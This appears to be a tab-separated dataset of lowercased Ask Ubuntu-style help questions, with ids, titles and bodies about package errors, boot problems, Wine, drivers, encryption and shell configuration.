155754	why is muon on kde failing with multiple package errors ?	the following error message appeared to me and preventing me to updating my system . the package system could not be initialized , your configuration may be broken the following error also appeared under details tab : encountered a section with no package : header regards ,
155760	ubuntu crashed unexpectedly when browsing	how can i boot to live cd and then access ext4 partitions .
155762	windows boot options menu error	i had windows 7 installed on my laptop , i tried installing ubuntu 12.04 via bootable cd for trial . i am still able to run ubuntu live through the cd , but i was unable to install . the installation process got completed only after selecting a partition disk and making it `` ext 2 '' type . however after installation i do not see any boot menu . i even tried windows repair , that does not seem to work though . also , i am not able to see any of the disk partition when i want to reinstall windows in any of the 7 partitions . how do i do that ? i just gave a try on secondary laptop in order to make sure it works . i am not keen to have ubuntu on this particular machine , i just want to have windows back without loss of any data . how do i do that ?
155763	software index is broken ; the culprit seem to be adobe flashplugin	first of all , i am abit intimidated by some of the patronising laguage that techies use on this site , so be kind . when i try to install updates on my machine i get a message box headlined software index is broken followed by the subtext it is impossible to install or remove any software . please use the package manager `` synaptic '' or run `` sudo apt-get install f '' in a terminal to fix this issue at first . i have tried that and it does n't help . the diagnostics suggest that the problem is with adobe-flashplugin . however , no matter what i do allows me to get rid of it . i looked on this site where it was suggested that i run a more specific sudo apt-get remove for adobe-flashplugin . this runs but does not remove the package . i am now baffled , i can not update my system because of it . can anyone help ?
155767	how do i import my ppa signing keys from a host into a virtual machine ?	please , give me some help : how can i export pgp keys i used for registration on ppa and then import in virtual machine 's ubuntu ? please , help me .
155768	how do i clean or disable the memory cache ?	after the system starts , in a few minutes my memory cache fills up and it starts using the swap . here 's a screenshot of /proc/meminfo . however , if i can disable this process / clean the cache once after that , i think my system will speed up to some extent . correct me if i am wrong here . i have also tried bleachbit memory cleaning , but it does n't seem to clean the memory cache properly . also , the feature is still in an experimental stage . there was already a similar question posted here : how can i disable the prefetch cache ? , but it was regarding ubuntu server , and also the answers involved manual settings etc . so , i want to know if there 's some software for disabling/enabling memory cache for ubuntu 12.04 .
155769	using alt+tab in remmina rdp connection	in ubuntu 12.04 , i want to use alt+tab in remote pc connected using remmina by rdp connection . at this time , when i go full screen , this shortcut is always handled by `` host '' and not by remote machine , so after pressing alt+tab , remmina is switched to another aplication . is it possible to configure remmina to pass this shortcut to remote machine ?
155773	no audio in garry 's mod with wine	i 've just built a new computer for myself , and having ubuntu 12.04 on it , i decided it was time for some games , so i installed wine1.5 , and loaded steam , sound works fine ... until i actually load a game , in this case , garry 's mod , at which point , it does n't have sound . i 've tried killing pulseaudio , this does n't work , i 've also tried uninstalling pulseaudio , this does more damage than it fixes , and did n't solve the problem , so i re-installed pulseaudio , opened up winecfg , and set all devices to pulseaudio , but this still did n't fix the problem . what am i doing wrong , or what is wine doing wrong , and how can i fix it ?
155775	why ca n't 'grub-mkconfig_lib` be opened , preventing a kernel upgrade ?	i try to update my ubuntu 12.04 and i have this error , then it update kernel . any clue what i can do to fix this ? sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 4 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up linux-image-3.2.0-25-generic ( 3.2.0-25.40 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.2.0-25-generic /boot/vmlinuz-3.2.0-25-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-25-generic /boot/vmlinuz-3.2.0-25-generic update-initramfs : generating /boot/initrd.img-3.2.0-25-generic warning : no support for locale : en_us.utf8 run-parts : executing /etc/kernel/postinst.d/pm-utils 3.2.0-25-generic /boot/vmlinuz-3.2.0-25-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-25-generic /boot/vmlinuz-3.2.0-25-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-25-generic /boot/vmlinuz-3.2.0-25-generic generating grub.cfg ... /etc/grub.d/10_linux : 24 : . : ca n't open /usr/share/grub/grub-mkconfig_lib run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-25-generic.postinst line 1010. dpkg : error processing linux-image-3.2.0-25-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-25-generic ; however : package linux-image-3.2.0-25-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.25.27 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured setting up plymouth-theme-kubuntu-logo ( 1:12.04ubuntu4 ) ... no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . update-initramfs : deferring update ( trigger activated ) generating grub.cfg ... /etc/grub.d/10_linux : 24 : . : ca n't open /usr/share/grub/grub-mkconfig_lib dpkg : error processing plymouth-theme-kubuntu-logo ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-25-generic warning : no support for locale : en_us.utf8 errors were encountered while processing : linux-image-3.2.0-25-generic linux-image-generic linux-generic plymouth-theme-kubuntu-logo e : sub-process /usr/bin/dpkg returned an error code ( 1 )
155778	how to recover from : an upgrade from `` precise '' to `` oneiric '' is not supported ?	when the system was updating the laptop suddenly `` died '' i do not know why the pc closed at the time of upgrade , but now it boots normally and i ca n't continue the upgrade . i have this specific message : an upgrade from `` precise '' to `` oneiric '' is not supported with this tool . what can i do ? thanks !
155785	bad dma/do_irq errors on suspend/resume , with occasional freezing	every time i suspend or resume my laptop ( dell latitude e6520 , bought this year ) , i get 2 messages of the form displayed on the console just before shutting down/starting up : [ 407.107610 ] ehci_hcd 0000:00:1d.0 : dma_pool_free buffer-128 , f6f18000/36f18000 ( bad dma ) on occasion , i get a message of the form : [ 3753.979066 ] do_irq : 0.177 no irq handler for vector ( irq -1 ) on occasion , my machine freezes with a flashing caps lock button when suspending , after which i need to do a hard shutdown . this never happened before the messages started appearing ( a while back ) , and i think it never happens without a do_irq message appearing ( although i 'm not sure about that ) . [ there 's nothing in the owner 's manual on a flashing caps lock button ; apparently it may be a kernel panic if the scroll lock also flashes , but the laptop does n't have a scroll lock light , and there 's no message on the console saying kernel panic . ] are these bad dma/do irq messages serious , and what can i do to investigate/troubleshoot them and the freezing ? edit : i 've also now received the following error messages a few times : [ 246943.023908 ] jbd : i/o error detected when updating journal superblock for sdb1 . [ 246943.023958 ] buffer i/o error on device sdb1 , logical block 0 [ 246943.023996 ] ext3-fs ( sdb1 ) : i/o error while writing superblock edit : output of dmesg at http : //pastebin.com/ra7mtqej ; contents of /var/log/kern.log at http : //pastebin.com/i6jf0md9 edit : the output of some smartctl ( -a , -x , -- log=error , -- log=xerror ) instructions is available at http : //paste.ubuntu.com/1088488/ . edit ( 31/8/2012 ) : output of dmesg|grep -i ehci available at http : //paste.ubuntu.com/1177246/ . edit : ( 3/9/2012 ) : output of lshw is at http : //paste.ubuntu.com/1183032
155786	nagios check_ping : invalid hostname/address	i 'm trying to setup nagios for a host what has the following webroot : www.example.com/ui/html/ , but nagios wo n't accept as host this kind of host path check_ping : invalid hostname/address . is there a workaround for this issue ? # define a host for the local machine define host { use linux-server ; name of host template to use ; this host definition will inherit all variables that are defined ; in ( or inherited by ) the linux-server host template definition . host_name example.com/ui/html alias example.com/ui/html address www.example.com/ui/html/ } # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # service definitions # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # define a service to check http on the local machine . # disable notifications for this service by default , as not all users may have http enabled . define service { use generic-service name http-service service_description http is_volatile 0 check_period 24x7 max_check_attempts 3 normal_check_interval 5 retry_check_interval 1 notifications_enabled 1 notification_interval 0 notification_period 24x7 notification_options c , r check_command check_http ! $ hostaddress $ register 0 } thanks
155788	how do in i install the streamripstar software from source ?	if i start my streamtuner i have no problems ... but if i want to record it doesnt work . so i tried to install streamripstar 0.6 beta 2 and download from http : //www.heise.de/download/streamripstar-e73875c1a305f94ec7cecdd722e1dafc-1340627657-2666052.html now i dont know how to install this on my kubuntu distribution ... please help me , i am new on ubuntu .
155791	how do i sudo a command in a script without being asked for a password ?	i want to turn my system on automatically every day . so i use the below code in my python script , but sudo asks me for a password every time : os.system ( 'sudo sh -c `` echo date \'+ % s\ ' -d \'+ \ 24 hours\ ' > /sys/class/rtc/rtc0/wakealarm '' ' ) how can i run this script without sudo asking for the password every time ?
155792	will ubuntu work on a gpt-partitioned 3tb disk ?	i 'm new to ubuntu and i wanted to give it a shot . i plan on splitting the 3tb i have but it 'll have to be gpt format . am planning to set up multi os , windows 7 is one of them . i heard that not all versions support this format ? any advice/suggestions ? thank you .
155797	how to share screen on ubuntu 11.04	i am new to ubuntu and am trying to share my screen ( to a user who geographically sits thousands of miles away from me ) . basically , he wants to control my desktop and perform some installation/up-gradation tasks . i know in windows team viewer can be used for this purpose but how to go about it on ubuntu 11.04 . will the vnc viewer help ? and if yes how to configure it so that i can share my screen and allow remote access through internet . or are there some rpm packages available to do so ? thanks in advance .
155799	chromium on ubuntu 12.04 - youtube doesnt work	for about last two weeks , probably after flash update i cant watch youtube . everytime i try to watch something my chromium is crashing . i dont know what to do . i can watch everything on firefox and it works very well . chromium 18.0.1025.168 ( build 134367 linux ) ubuntu 12.04 flash version - 11,2,202,236 what do ? thanks in advance
155801	quickly and python twisted	i am creating a quickly application that makes use of python twisted . when the user launches a window , i want to start the twisted server i wrote . however , when i do this , it freezes the gui , because the reactor.run method is constantly running after it is started . i need a way to start the twisted reactor in its own thread , so that the gui will continue to operate while the reactor is running . i have read about using twisted with pygtk in the twisted documentation , but i am not sure how i would accomplish this with a quickly application . what is the best way to start my twisted server when a window opens without freezing the gui ? update : my if __name__ == '__main__ ' statement at the end of my dialog file is : print 'preparing glib' glib.idle_add ( before_running ) print 'staring reactor' from twisted.internet import reactor reactor.run ( ) ` i have imported and installed twisted.gtk3reactor earlier on in the file . the before_running method contains dialog = clientdialog ( ) and dialog.show , as well as the rest of the code i want to run when the dialog opens .
155803	websites running on server showing virus warnings	i am running plesk 9.5 on ubuntu 8.04 lts and have about 15 websites infected with some malicious code appended to the end of java files . i have installed clamav and it has managed to pickup the infected files which have a pattern of starting with either /km0ae9gr6m/ or /gootkitstart/ and ending with /qhk6sa6g1c/ or /gootkitend/ my plesk panel is up to date and security patches were installed . how can i isolate the security vulnerability on the server ?
155809	can wine support office 2007 ?	i tried installing office 2007 in ubuntu with wine but it was throwing an error after installing and also when i tried to open a powerpoint document and save it . has anybody gotten office 2007 installed without any issues ? please help me .
155811	psensors do n't detect all sensors	on windows i can see my cpu sensor , but in ubuntu , using psensor , i ca n't see cpu sensor . it detects gpu sensor ( which i do n't have ) and it detects cpu usage . is there any other tool which can detect my cpu temperature sensor .
155812	separate panels in unity 5 on precise ?	is it possible to create separate panels in unity on precise 12.04 . like in gnome you did a new panel and you put it where you want , autohide it or not ? ? is this possible if yes how and if not why ? maybe somebody has an answer . i switched these days from lucid to precise . i like unity but some things are a bit long to reach . i 'd like to make like a gnome menu . because to reach programs using the dash or the super key is not the maximum ( dash is slow and super key yu have to know the name ) thanks for reply
155815	can any body help me in upgrading my ubuntu os to latest version 12.04 from 11.10 ? have anybody faced issues ?	i have installed ubuntu 11.10 in my laptop . i saw ubuntu software centre showing updrade to 12.04 version . will it retain my old files and softwares in 11.10 version or will it install a fresh copy . have anybody faced problem while upgrading . please inform in this post .
155817	installation of win 7 using virtual box on ubuntu 12.04 shows error	i have a ubuntu 12.04 system with x86-64 bit system architecture . every time i try to install any windows os using virtual box it shows error `` fatal error : boot medium halted or not found '' . what do i do next ? what is causing this problem ? tried several online links for installing windows os on ubuntu using virtual box and also for installing virtual box . the virtual box is installed correctly as per my thinking .
155831	how do i install catia v5 in wine ?	i try to install catia v5r19 ( or v5r18 ) using wine . i have ubuntu 12.04 with all up dates . i install wine terminal > winetricks vcrun2005 vcrun2008 i copy msdrm.dll in *.wine/drive_c/windows/system32* i mount catia iso and launch setup.exe error : wrong parameters the setup launches , and after validating the installation i got a frozen screen > see screenshot < any advice ? solution ? thanks !
155832	dual screen will only mirror after 12.04 upgrade	i have been using ubuntu with a dual screen for years now , after upgrading to 12.04 lts i can not get my dual screen working properly graphics : 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv350 ar [ radeon 9600 ] 01:00.1 display controller : advanced micro devices [ amd ] nee ati rv350 ar [ radeon 9600 ] ( secondary ) i noticed i was using open source drivers and attempted to install official binaries using the methods in this thread . output : liam @ liam-desktop : ~ $ sudo apt-get install fglrx fglrx-amdcccle reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : fglrx fglrx-amdcccle 2 upgraded , 0 newly installed , 0 to remove and 12 not upgraded . need to get 45.1 mb of archives . after this operation , 739 kb of additional disk space will be used . get:1 http : //gb.archive.ubuntu.com/ubuntu/ precise/restricted fglrx i386 2:8.960-0ubuntu1 [ 39.2 mb ] get:2 http : //gb.archive.ubuntu.com/ubuntu/ precise/restricted fglrx-amdcccle i386 2:8.960-0ubuntu1 [ 5,883 kb ] fetched 45.1 mb in 1min 33s ( 484 kb/s ) ( reading database ... 328081 files and directories currently installed . ) preparing to replace fglrx 2:8.951-0ubuntu1 ( using ... /fglrx_2 % 3a8.960-0ubuntu1_i386.deb ) ... removing all dkms modules error ! there are no instances of module : fglrx 8.951 located in the dkms tree . done . unpacking replacement fglrx ... preparing to replace fglrx-amdcccle 2:8.951-0ubuntu1 ( using ... /fglrx-amdcccle_2 % 3a8.960-0ubuntu1_i386.deb ) ... unpacking replacement fglrx-amdcccle ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot setting up fglrx ( 2:8.960-0ubuntu1 ) ... update-alternatives : warning : forcing reinstallation of alternative /usr/lib/fglrx/ld.so.conf because link group i386-linux-gnu_gl_conf is broken . update-alternatives : warning : skip creation of /etc/opencl/vendors/amdocl64.icd because associated file /usr/lib/fglrx/etc/opencl/vendors/amdocl64.icd ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalcl.so because associated file /usr/lib32/fglrx/libaticalcl.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalrt.so because associated file /usr/lib32/fglrx/libaticalrt.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : forcing reinstallation of alternative /usr/lib/fglrx/ld.so.conf because link group i386-linux-gnu_gl_conf is broken . update-alternatives : warning : skip creation of /etc/opencl/vendors/amdocl64.icd because associated file /usr/lib/fglrx/etc/opencl/vendors/amdocl64.icd ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalcl.so because associated file /usr/lib32/fglrx/libaticalcl.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalrt.so because associated file /usr/lib32/fglrx/libaticalrt.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-initramfs : deferring update ( trigger activated ) update-initramfs : generating /boot/initrd.img-3.2.0-25-generic-pae loading new fglrx-8.960 dkms files ... building only for 3.2.0-25-generic-pae building for architecture i686 building initial module for 3.2.0-25-generic-pae done . fglrx : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-25-generic-pae/updates/dkms/ depmod ... ... . dkms : install completed . update-initramfs : deferring update ( trigger activated ) processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... setting up fglrx-amdcccle ( 2:8.960-0ubuntu1 ) ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-25-generic-pae processing triggers for libc-bin ... ldconfig deferred processing now taking place liam @ liam-desktop : ~ $ sudo aticonfig -- initial -f aticonfig : no supported adapters detected when i attempt to get my settings back to what they were before upgrading i get this message requested position/size for crtc 81 is outside the allowed limit : position= ( 1440 , 0 ) , size= ( 1440 , 900 ) , maximum= ( 1680 , 1680 ) and gdbus.error : org.gtk.gdbus.unmappedgerror.quark._gnome_2drr_2derror_2dquark.code3 : requested position/size for crtc 81 is outside the allowed limit : position= ( 1440 , 0 ) , size= ( 1440 , 900 ) , maximum= ( 1680 , 1680 ) any idea 's on what i need to do to fix this issue ?
155833	how can i make the launcher disappear after notification	i have a generally stock configured unity 2d , with the launcher in auto-hide mode . when i get a notification , the launcher pops out and the relevant icon wiggles . that is all functioning well . my problem is that the launcher pops out for maybe 5 seconds before hiding . often times i 'm typing or using the mouse on the portion of the display that is now covered by the launcher . after i 've mentally received the notification is there some way to tell the launcher `` i 've seen this , you can go away now '' . note , i 'm not wanting to modify or shorten the default display time . i 'd be very happy to hit 'alt-h ' or some other key combination to make it go away .
155834	how do i create a liveusb that lets me install any ubuntu version ?	what i 'd like to do : have ubuntu installed on a usb drive and from there install any ubuntu version on a hdd . this is kinda different from using usb-creator because i 'd like to have a persistent ubuntu install on the usb drive and not upgrade it every 6 months . from there i 'd like to be able to install the most recent ubuntu version . i think it 's just a matter of configuring ubiquity , but do n't know if this is the case and how exactly do this . edit : let 's clarify the persistent thing : suppose i have my usb with ubuntu precise on it suppose quantal is out in the wild suppose that i want to install quantal on the hdd of a computer suppose that i want/can use only the usb drive with precise on it i should erase/upgrade precise on the usb drive to quantal and then install it on the hard drive i do n't want to modify my ubuntu install on the usb drive , i 'd like to be able to install the newer ubuntu version ( quantal ) on a hdd from another one ( precise ) on a usb drive . there 's no problem for me to add files to the usb drive , as long as it does n't interfere with the distro on it . i 'd better avoid upgrading the installation on the hdd hope this helps
155836	wireless internet connection sharing	is there a way to connect my desktop pc to my laptop to acess the web ? i have wifi and do n't have a wireless card , so my desktop is unconnected , and i really do n't want to drag it all over my house to the router just to install some software .
155841	how to build pyqt for deadsnakes python 2.7 on ubuntu 10.04 ?	i am trying to configure python2.7 on ubuntu 10.04 as an alternative package . i got the deadsnakes ppa i set up pip and virtualenv now , i am trying to build pyqt ( pyside seems to have similar problems in that pip is not supported ) i have activated virtualenv and have downloaded sip . ( qtenv ) ~/sip-4.13.3 $ python2.7 configure.py ( qtenv ) ~/sip-4.13.3 $ make gcc -c -pipe -fpic -o2 -w -dndebug -i . -i/usr/include/python2.7 -o siplib.o siplib.c siplib.c:20:20 : error : python.h : no such file or directory and of course now there is a cornucopia of errors after that supposedly , i would need python-dev for the python headers but i already have it installed in regular enviroment ( python 2.6 on ubuntu 10.04 ) . so how do i get the headers file for python2.7 builds ? it seems i am only a few steps away from shaving the yak ... for other readers , a synopsis ... the op is running ubuntu 10.4 ( which by default uses an older version of python2.6 ) but wants python2.7 and the pyqt package , which depends on the sip package ( from the authors of pyqt . ) the op has installed and is using virtualenv , which lets you have multiple versions of python installed . pyqt is a binding from python to the qt c library . its installation requires compilation against the python header files ( e.g . python.h which is found e.g . in /usr/local/include/python2.6 , or ... 2.7 ) a standard installation of ubuntu does not have those python header files . they can be installed as package python-dev , but they will match the installed version of python e.g . 2.6 . evidently the op has installed python-dev for python2.6 ( and the virtualenv can see it ) . the op changed directory to the sip directory and ran the configure script , but since it was executed by python2.7 , it configured the make scripts for sip to look for python2.7 header files . the op needs to install python-dev package for python2.7 into their second , virtual , python environment that is running python2.7 . ( i am also trying to build sip and pyqt on ubuntu 12.04 and it is also failing to find /usr/local/include/python.h . i installed python-dev which installed to /usr/include/python2.7 . maybe the configure script for pyqt is flawed . this is a common problem on linux , that there is no absolutely standard place to install things , especially when multiple versions of a thing might be installed . )
155844	problems starting to use launchpad	i 've been reading the different tutorials that launchpad directs you to . and they 've all helped alot . and seems like the system is a lot simpler and easier to use than github . but i ca n't seem to get my first code up into project . i followed this tutorial > push bazaar branch but when i type the first command , i get back this : warning : gnome-keyring : : could n't connect to : /tmp/keyring-g5jhuc/pkcs11 : no such file or directory i 've already made my ssh keys and registered it with launchpad . and tried both with and without optional config file . i still get back the same exact thing . : ( i understand that these tools need to be powerful for developers . just wish it did n't have to be so difficult . edit oh and as a side note , can i upload illumination software creator files ? or a tar.gz file of all the artwork in my project ? second edit i just now tried another command found on the launchpad page for uploading code to a branch bzr push lp : ~clem11388/pictureadventure/trunk but i get this back bzr : error : not a branch : `` /home/daniel/my projects/ '' . so could the problem be that i do n't know what a `` branch '' is ? much less how to create one ? i 'm going to be trying to enter this app / game into the app showdown . so i really need to get all this figured out soon .
155845	how do i change to iso 8601 date format ?	i want to use the iso 8601 date format system wide with ubuntu 12.04 . what is the best way to accomplish this ?
155847	how to install ubuntu 12.04 via ssh ?	debian cds/dvds used to ( i have n't done it in the last 1.5 years anymore ) allow to start the setup and continue it via ssh after a certain point . how can i do the same in ubuntu ? i did n't find the option among the boot menu options .
155848	how do i grep audio/video frame time indexes from an xml file ?	i have a xml file like this : < field name= '' frame.time_delta_displayed '' showname= '' time delta from previous displayed frame : 0.000000000 seconds '' size= '' 0 '' pos= '' 0 '' show= '' 0.000000000 '' / > < field name= '' frame.time_delta_displayed '' showname= '' time delta from previous displayed frame : 0.000201000 seconds '' size= '' 0 '' pos= '' 0 '' show= '' 0.000201000 '' / > < field name= '' frame.time_delta_displayed '' showname= '' time delta from previous displayed frame : 0.000595000 seconds '' size= '' 0 '' pos= '' 0 '' show= '' 0.000595000 '' / > i want to grep all the values in the show= '' xxx '' part , the output would be : 0.000000000 0.000201000 0.000595000 ... is it possible to do that by using grep ?
155852	installing chrome java plugin	i 've been trying to install the java plugin for chrome for a couple hours now , and i figured it was time to ask people with more experience . i ca n't seem to get it working . my current java version is the 64-bit openjdk 1.6.0_24 . i tried installing the icedtea plugin to no avail . i have ubuntu 12.04 64-bit installed at the moment . when i tried testing if java was enabled in chrome , any website with a java applet would not load ( when i disabled the plugin , they loaded , but not the applet ) . i followed the instructions from here : http : //technonstop.com/install-java-plugin-ubuntu-linux which said to create this script and run it : java_home=/usr/lib/jvm/jdk1.7.0 mozilla_home=~/.mozilla mkdir $ mozilla_home/plugins ln -s $ java_home/jre/lib/i386/libnpjp2.so $ mozilla_home/plugins note : you may need to change the value of java_home so that it correctly points to your installation of the jdk . 64-bit users will need to change the final line to : ln -s $ java_home/jre/lib/amd64/libnpjp2.so $ mozilla_home/plugins but this did not work as well . i just test it in firefox and it 's working . still nothing for chrome
155853	touchscreen no longer working on dell latitude 2120	i initially had ubuntu 10.10 installed on my netbook , the touch-screen worked completely fine however the distribution upgrade to 12.04 has resulted in my touch-screen no longer working . lsusb lists many of my other devices properly , but also has this bus 004 device 002 : id 1cb6:6651 which i believe to be my touch-screen . additionally , xinput -- list shows the following : virtual core pointer id=2 [ master pointer ( 3 ) ] âł virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] âł synps/2 synaptics touchpad id=11 [ slave pointer ( 2 ) ] i did some digging on the dell website , the touch-screen itself is an ideacom idc 6651 , but there are no linux drivers for available for it from there . additionally , lshal shows the following information also related to the touchscreen udi = '/org/freedesktop/hal/devices/usb_device_1cb6_6651_noserial_if0' info.linux.driver = 'usbhid ' ( string ) info.parent = '/org/freedesktop/hal/devices/usb_device_1cb6_6651_noserial ' ( string ) info.product = 'usb hid interface ' ( string ) info.subsystem = 'usb ' ( string ) info.udi = '/org/freedesktop/hal/devices/usb_device_1cb6_6651_noserial_if0 ' ( string ) linux.hotplug_type = 2 ( 0x2 ) ( int ) linux.subsystem = 'usb ' ( string ) linux.sysfs_path = '/sys/devices/pci0000:00/0000:00:1d.2/usb4/4-2/4-2:1.0 ' ( string ) usb.bus_number = 4 ( 0x4 ) ( int ) usb.can_wake_up = true ( bool ) usb.configuration_value = 1 ( 0x1 ) ( int ) usb.device_class = 0 ( 0x0 ) ( int ) usb.device_protocol = 0 ( 0x0 ) ( int ) usb.device_revision_bcd = 4097 ( 0x1001 ) ( int ) usb.device_subclass = 0 ( 0x0 ) ( int ) usb.interface.class = 3 ( 0x3 ) ( int ) usb.interface.number = 0 ( 0x0 ) ( int ) usb.interface.protocol = 0 ( 0x0 ) ( int ) usb.interface.subclass = 0 ( 0x0 ) ( int ) usb.is_self_powered = false ( bool ) usb.linux.device_number = 2 ( 0x2 ) ( int ) usb.linux.sysfs_path = '/sys/devices/pci0000:00/0000:00:1d.2/usb4/4-2/4-2:1.0 ' ( string ) usb.max_power = 100 ( 0x64 ) ( int ) usb.num_configurations = 1 ( 0x1 ) ( int ) usb.num_interfaces = 1 ( 0x1 ) ( int ) usb.num_ports = 0 ( 0x0 ) ( int ) usb.product = 'usb hid interface ' ( string ) usb.product_id = 26193 ( 0x6651 ) ( int ) usb.speed = 12.0 ( 12 ) ( double ) usb.vendor = 'ideacom ' ( string ) usb.vendor_id = 7350 ( 0x1cb6 ) ( int ) usb.version = 1.1 ( 1.1 ) ( double ) any help with this issue would be appreciated .
155860	are there any video or audio encryption software avialable in ubuntu 12.04 repositories	i have to submit my video presentation and other pptx files so i need them to be encrypted . . is there any software or application available in ubuntu 12.04 repositories for doing this . i tried this link which uses gpg file encryption method , but however , the platform to be presented on might be windows , so i am not sure whether to use this or not , also after using will this work or not . i want to mention i am not talking about dvd encryption , but rather format-wise encryption . for example - .avi , .mp4 , .flv . i am using ubuntu 12.04 64-bit system . note : i just realized i can use secure archiving like zip or rar , but that would defy the need for such encryption application . also i can rename them to any unsuspecting file , and removing the extension .for example : .recycle . [ for the time being i will use one of these methods , but will keep an eye for such app if available , so i am not closing this question until then ] after searching i found there are windows software available for that purpose , but in linux i was unsuccessful .
155861	how do i change keyboard layout for just one user on ubuntu server ?	note : i need a solution which preferably uses only the cli . i happen to have a nice new macbook with a , here it comes , german keyboard . all my colleagues work with us keyboards . therefore , our ubuntu 10.04 lts servers are all set to us-keyboards . is there a way to just set my own user account settings to a german keyboard layout without touching the system-wide keyboard settings or those of my other colleagues ? is n't there an easy way to set that in ~/profile , e.g . keyboard= '' de '' ? ( i am working without any ubuntu user interface , just the command line )
155865	what are login and non-login shells ?	it is said that settings for non login shell to go into .bashrc file and login shell settings to go into .profile file . what is really meant by login and non-login shells ? please explain without using technical jargon as far as possible .
155868	synchronize wireless passwords between computers	is it possible to synchronize wireless network passwords between multiple computers running ubuntu ? it would1 save me a lot of time if i did n't need to re-enter every wireless password whenever i started using a new ubuntu installation .
155869	how do i get ubuntu to not mount my encrypted partitions on boot ?	i 'm using dm-crypt and lvm , which i set up during installation . i have two volume groups , one of which is encrypted and not needed for system/boot purposes . as of now , ubuntu asks for a password on boot to mount the encrypted volumes . the computer in question will be remotely administered , so i wo n't be able to enter any password on boot . ideally i would like it to boot normally without asking for a password , after which i could ssh in and mount the encrypted volume manually . i suspect this involves creating a new initramfs , but i 'm not sure . any hints as to what i need to do to not have to enter a password on boot ?
155872	how to implement raid 1 ?	how to set up raid 1 [ software , hardware or fake ] on ubuntu 12.04 desktop ?
155874	is it possible to remove lock from a file locked through root	so i barely began to explore and learn command line , i found that if i download files while in root access the files are automatically locked . my question is if there is a way to remove the lock to make it more easily accessible and without having to be in root or using the nautilus command , help will be very much appreciated , thank you . btw : running on ubuntu 12.xx
155876	how can i backup and encrypt with tar , split and openssl , all in one command ?	i often use tar to backup my stuff in 4 gigabyte chunks to a directory on a fat32-formatted disk , as documented here . to get that done , i use the following command : tar -cvpj /path/to/directory/ | split -d -b 4000m - `` backup.tar.bz2. '' . i want to encrypt these tar.bz2 . * files with openssl aes-256-cbc , if possible right after making a 4 gb chunk instead of after the whole backup job . i 'd like to know the proper command to do that , and how to reconstitute the archive after creation .
155877	how to empty the queue of pending notifications ?	i have an application that went completely crazy and sent ( it seems like ) hundreds of notifications to the notification daemon . now i 've been getting notification bubbles for the last few minutes and it is getting annoying . how can i make them stop without logging off or rebooting ?
155879	how to get current gnome keyboard layout from terminal ?	for usage in a bash script , i need to get the gnome keyboard layout the user is currently using . for example if the user sets its keyboard layout to en-us , i need a bash command that prints me this . how can i get that information ? update : setxkbmap -query is unfortunatelly not working . below is the ouput with the en ( first command ) and the de ( second command ) layout activated . switching keyboard layout seems to be have some relation with gnome session configuration setxkbmap -query rules : evdev model : pc105 layout : us , de variant : , options : terminate : ctrl_alt_bksp , lv3 : ralt_switch , grp : alts_toggle setxkbmap -query rules : evdev model : pc105 layout : us , de variant : , options : terminate : ctrl_alt_bksp , lv3 : ralt_switch , grp : alts_toggle update2 : setxkbmap -print # with en-us layout xkb_keymap { xkb_keycodes { include `` evdev+aliases ( qwerty ) '' } ; xkb_types { include `` complete '' } ; xkb_compat { include `` complete '' } ; xkb_symbols { include `` pc+us+de:2+inet ( evdev ) +level3 ( ralt_switch_for_alts_toggle ) :1+level3 ( ralt_switch_for_alts_toggle ) :2+group ( alts_toggle ) +level3 ( ralt_switch ) +terminate ( ctrl_alt_bksp ) '' } ; xkb_geometry { include `` pc ( pc105 ) '' } ; } ; setxkbmap -print # after switching to german layout xkb_keymap { xkb_keycodes { include `` evdev+aliases ( qwerty ) '' } ; xkb_types { include `` complete '' } ; xkb_compat { include `` complete '' } ; xkb_symbols { include `` pc+us+de:2+inet ( evdev ) +level3 